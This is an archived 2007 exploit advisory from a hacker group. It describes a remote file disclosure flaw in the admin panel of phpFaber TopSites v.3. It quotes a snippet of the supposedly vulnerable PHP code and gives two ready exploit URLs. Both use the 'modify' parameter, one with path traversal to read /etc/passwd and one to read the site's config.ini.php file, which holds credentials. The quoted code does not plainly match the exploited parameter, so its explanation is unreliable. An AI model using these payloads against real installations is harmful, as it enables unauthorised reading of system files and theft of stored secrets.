Home / os / solaris

phpfaber-include.txt

Posted on 13 April 2007

# phpFaber TopSites v.3(index.php)Remote File Disclosure Vulnerability # D.Script: http://www.phpfaber.com/cms_content/files/phpfaber_topsites.zip # Discovered by: Dr.RoVeR -->Arab48 Hacker -->Dr.RoVeR@HackerMail.CoM # Greetz To: Tryag Team #You have to be admin to run the script :D # V.Code: ############################################################## #if (!$_GET['page'] || preg_match('/W/',$_GET['page']) #|| !file_exists(PATH_SITE.FLD_ADMIN.$_GET['page'].'.php')) #$_GET['page'] = 'summary'; ############################################################## #Exploit:/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd #Exploit:/Path/admin/index.php?page=template&modify=inc/config.ini.php -- _______________________________________________ Get your free email from http://www.hackermail.com

 

TOP